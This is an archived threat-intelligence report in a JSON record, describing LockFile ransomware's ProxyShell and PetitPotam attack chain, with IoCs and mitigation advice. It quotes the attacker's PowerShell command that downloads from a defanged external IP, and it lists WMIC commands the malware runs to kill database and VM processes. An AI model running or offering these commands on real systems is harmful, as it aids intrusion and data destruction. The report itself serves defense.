{
	"id": "b0bb02fa-96a9-461d-baa9-a895f9f662f2",
	"created_at": "2026-04-06T00:15:40.835385Z",
	"updated_at": "2026-04-10T03:22:03.735789Z",
	"deleted_at": null,
	"sha1_hash": "34b2552f7505c9936c3a7a5a843965a86eec8733",
	"title": "LockFile Ransomware: Exploiting Exchange With ProxyShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1905684,
	"plain_text": "LockFile Ransomware: Exploiting Exchange With ProxyShell\r\nPublished: 2021-08-25 · Archived: 2026-04-05 13:50:37 UTC\r\nLockFile Ransomware: Exploiting Microsoft Exchange Vulnerabilities Using ProxyShell\r\nCyble's research on the LockFile ransomware that is attacking Microsoft Exchange servers using the ProxyShell attack.\r\nThe LockFile ransomware was first seen in July 2021 and has been highly active since then. It operates globally, and most of its victims are in the United States of America and Asia. The ransomware group hosts a website on the TOR network to guide victims to pay the ransom and then receive instructions to decrypt their files. This webpage contains a uTox ID and an email address for contacting the Threat Actor (TA), as shown in the figure below.\r\nFigure 1: LockFile Ransomware Website\r\nCyble Researchers found a few details on the ransomware website indicating that the gang could also be related to other threat actors. For example, the last line of the ATTENTION section of the website mentions a wallpaper being provided by LockBit, and the contact email contains a reference to Conti.\r\nRecently, the TA behind LockFile has started attacking Microsoft Exchange Servers using the ProxyShell attack. ProxyShell chains the Microsoft Exchange vulnerabilities listed below, resulting in unauthenticated code execution. Orange Tsai, a Principal Security Researcher from Devcore, recently discovered these vulnerabilities. Following is the list of vulnerabilities.
\r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 1 of 12\n\nCVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (Patched in April by KB5001779)\r\nCVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend (Patched in April by KB5001779)\r\nCVE-2021-31207 - Post-auth Arbitrary-File-Write leads to RCE (Patched in May by KB5003435)\r\nAccording to a Symantec blog post, after successful exploitation, the TA uses the following PowerShell command.\r\npowershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH\r\nThe PowerShell command in use is unknown, but on August 13, 2021, an independent security researcher captured the associated IP address (209.14.0[.]234). According to the researcher, attackers used this IP to exploit the ProxyShell vulnerability.\r\nResearchers also found that 20 to 30 minutes before the deployment of the ransomware, the TA drops three files:\r\nAn exploit for the PetitPotam vulnerability (CVE-2021-36942), namely efspotato.exe.\r\nTwo files: active_desktop_render.dll and active_desktop_launcher.exe\r\nThe PetitPotam vulnerability allows the TA to compromise the Domain Controller, which results in the compromise of the complete Active Directory. The PetitPotam technique uses MS-EFSRPC (Microsoft's Encrypting File System Remote Protocol), which is responsible for performing maintenance and management operations on encrypted data stored on a remote system.\r\nAs per Symantec, the executable active_desktop_launcher.exe is legitimate software, but active_desktop_render.dll is a malicious Dynamic Link Library (DLL). The active_desktop_render.dll is loaded using a DLL Search Order Hijacking attack. After loading, the DLL file drops and decrypts desktop.ini in a local directory.
This desktop.ini then loads and executes shellcode, which then activates the efspotato.exe file that exploits the PetitPotam vulnerability.\r\nUpon compromising the domain, the TA then deploys LockFile ransomware on various systems of the compromised domain.\r\nCyble Research found one of the LockFile malware samples on the surface web while conducting routine Open-Source Intelligence (OSINT) threat hunting exercises. The figure below shows the high-level execution flow of LockFile Ransomware. The malware initially kills all the known processes related to virtual machines, databases, and other related services. Then it iterates through the drives on the system to find the logical drives to search for files and folders. After the files are found, the malware checks the extension of each file, and if it matches a pre-defined file extension, the ransomware encrypts it. After completing the encryption process, it deletes itself.\r\nFigure 2: High-level execution flow of LockFile Ransomware\r\nTechnical Analysis\r\nOur static analysis found that the malware is a Windows-based x64 architecture console application written in C/C++ and compiled on 2021-07-03 18:15:34, as shown in the figure below.\r\nFigure 3: Static details of LockFile Ransomware\r\nAs shown in the figure below, the malware creates several subprocesses to perform several activities upon execution.\r\nFigure 4: Process Tree created by LockFile Ransomware\r\nThe subprocess kills the various running processes shown in Table 1. The malware uses the Windows Management Instrumentation Command-line (WMIC) tool and wraps the process name in % wildcards to achieve this task.
WMIC is a simple command prompt tool that returns information about the system you are running it on.\r\nThe list of commands which the malware executed is shown in the table below.\r\nCommand  Target Process\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%vmwp%'\" call terminate  vmwp\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%virtualbox%'\" call terminate  virtualbox\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%vbox%'\" call terminate  vbox\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%sqlservr%'\" call terminate  sqlservr\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%mysqld%'\" call terminate  mysqld\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%omtsreco%'\" call terminate  omtsreco\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%oracle%'\" call terminate  oracle\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%tnslsnr%'\" call terminate  tnslsnr\r\nC:\\Windows\\system32\\cmd.exe /c wmic process where \"name like '%vmware%'\" call terminate  vmware\r\nTable 1: WMIC Commands executed by Ransomware to Kill Processes\r\nOnce the ransomware kills all the processes, it iterates through the victim's machine and encrypts the user document files, appending the .lockfile extension, as shown in the figure below.\r\nFigure 5: Files encrypted by LockFile\r\nOnce the files are encrypted, the malware launches an HTML Application (HTA) file to show the ransom message to the user, as shown in the figure below, and then deletes itself.\r\nFigure 6: Ransom Message Created by LockFile\r\nCode Analysis and Debugging\r\nThe figure below shows that, upon debugging, the malware calls a series of WMIC commands to kill various processes.
The list of commands is shown in Table 1.\r\nFigure 7: WMIC commands used by LockFile ransomware to kill processes\r\nOnce the ransomware kills all the defined processes, it extracts the ransom note content from the executable, as shown below.\r\nFigure 8: Ransom Note Extracted from LockFile Ransomware in Memory\r\nAfterward, the malware gets the list of drives using the GetLogicalDriveStringsA Application Programming Interface (API). The drives are then passed one at a time to the GetDriveTypeA API, and the result is compared with 03 (DRIVE_FIXED), which indicates whether the drive is fixed media, e.g., a logical drive, as shown below. Once such a drive is located, the malware creates a thread to conduct further ransomware activity.\r\nFigure 9: Fixed Media checked by LockFile\r\nThe malware thread creates LOCKFILE-README.hta in the root, as shown in the figure below.\r\nFigure 10: LockFile's Thread creating LOCKFILE-README.hta in C:/\r\nThen the ransomware starts iterating through the files and folders. The code passes whatever files/folders are found through a series of checks, listed below.\r\n1 – the desktop.ini string is not present in the filename\r\n2 – \\Windows is not present in the full path\r\n3 – the LOCKFILE string is not present in the filename\r\n4 – the NTUSER string is not present in the filename\r\nThe checks are shown in the code below.\r\nFigure 11: Checks performed by LockFile.\r\nOnce all the checks are passed, the malware compares the file's extension with the pre-defined extensions embedded in the malware. The code is shown in the figure below.
\r\nFigure 12: File Extension Compared by LockFile\r\nFor example, in the figure below, we can see that the malware is comparing the extension of 36897c.rbf with the .1cd extension.\r\nFigure 13: Ransomware Check File Extension\r\nSimilarly, the malware compares all the extensions shown in Table 2 with the victim's files. This activity helps us conclude that the malware targets only files with specific extensions.\r\n.1cd, .7z, .7zip, .acccdb, .ai, .asp, .aspx, .backup, .bak, .cd, .cdr, .cdx, .cer, .cf, .cfl, .cfu, .config, .cs, .csv, .dat, .db, .dbf, .doc, .docx, .dt,\r\n.dwg, .edb, .efd, .elf, .epf, .erf, .fpt, .geo, .grs, .html, .ibd, .jpeg, .ldf, .lgf, .lgp, .log, .mdb, .mdf, .mft, .mp3, .mxl, .myd, .odt, .pdf, .pff,\r\n.php, .ppt, .pptx, .ps1, .psd, .pst, .rar, .sln, .sql, .sqlite, .st, .tiff, .txt, .vdi, .vhd, .vhdx, .vmdk, .vrp, .wdb, .xls, .xlsx, .zip\r\nTable 2: List of File Extensions which are targeted by ransomware\r\nAs shown below in Figure 14, once a file is found with a defined extension, the malware reads the plain text content from the file.\r\nFigure 14: Read Plain Text content from Victim's File\r\nIt then calls another user-defined function to encrypt the content using the Advanced Encryption Standard (AES), as shown below.
\r\nFigure 15: Call Encryption Function to encrypt the content\r\nOnce the content is encrypted, the malware writes it back into the file and then appends the .lockfile extension to the encrypted file using the MoveFileA API, as shown in the figure below.\r\nFigure 16: Append .lockfile extension to the user document file\r\nThe same activity is shown below in Figure 17.\r\nFigure 17: Append .lockfile extension to the user document file while debugging\r\nOnce all the files have been encrypted, the malware creates a ransom note .hta file in the C:\\Users\\Public directory, as shown in the figure below.\r\nFigure 18: Creates .HTA ransom file in C:\\Users\\Public\r\nOnce the .hta ransom file is created, it calls the CreateProcess API to launch the .hta file using the mshta.exe Windows utility. mshta.exe is a utility that executes Microsoft HTML Application (HTA) files.\r\nFigure 19: Launch .HTA ransom File using mshta.exe\r\nFinally, once all the files are encrypted, the malware deletes itself by calling the del command, as shown below.\r\nFigure 20: Use Del command to delete itself\r\nConclusion\r\nThe threat actors behind LockFile exploit publicly disclosed vulnerabilities in sequence to attack Microsoft Exchange Server and then use the PetitPotam vulnerability to compromise the Domain Controller. After achieving these two objectives, the TA drops the LockFile ransomware onto the systems.\r\nBased on the ransom notes, we speculate that the TA may be creating unique custom variants of the LockFile ransomware for each victim organization.\r\nCyble Research Labs continuously monitors LockFile ransomware activity; we will continue to update our readers with our latest findings.
\r\nOur Recommendations\r\nWe have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below:\r\nPatch CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 as soon as possible if not patched already.\r\nFollow the KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) guide to mitigate the impact of PetitPotam.\r\nRegularly perform a vulnerability assessment of organizational assets, especially those exposed to the internet.\r\nUse a reputable anti-virus and internet security software package on your connected devices.\r\nConduct regular backups and keep those backups offline or on a separate network.\r\nRefrain from opening untrusted links and email attachments without verifying their authenticity.\r\nTurn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.\r\nUse strong passwords and enforce multi-factor authentication wherever possible.
\r\nMITRE ATT\u0026CK® Techniques\r\nTactic  Technique ID  Technique Name\r\nReconnaissance  T1595.002  Active Scanning\r\nReconnaissance  T1591  Gather Victim Org Information\r\nReconnaissance  T1593  Search Open Websites/Domains\r\nInitial Access  T1190  Exploit Public-Facing Application\r\nExecution  T1059.001  Command and Scripting Interpreter: PowerShell\r\nDefense Evasion  T1574.001  Hijack Execution Flow: DLL Search Order Hijacking\r\nLateral Movement  T1210  Exploitation of Remote Services\r\nImpact  T1486  Data Encrypted for Impact\r\nIndicators of Compromise (IoCs):\r\nIndicators  Indicator type  Description\r\n354a362811b8917bd7245cdd43fe12de9ca3f5f6afe5a2ec97eec81c400a4101  SHA256  LockFile Ransomware\r\ned834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291  SHA256  Malicious DLL\r\n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9  SHA256  Driver file\r\n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f  SHA256  Malicious executable\r\n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75  SHA256  Malicious DLL\r\n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd  SHA256  PetitPotam exploit\r\nbf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce  SHA256  LockFile executable\r\n209.14.0[.]234  IP address  Attacker's IP\r\nAbout Us\r\nCyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure on the Darkweb. Its prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch In 2020.
Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.\r\nSource: https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/"
	],
	"report_names": [
		"lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434540,
	"ts_updated_at": 1775791323,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/34b2552f7505c9936c3a7a5a843965a86eec8733.pdf",
		"text": "https://archive.orkl.eu/34b2552f7505c9936c3a7a5a843965a86eec8733.txt",
		"img": "https://archive.orkl.eu/34b2552f7505c9936c3a7a5a843965a86eec8733.jpg"
	}
}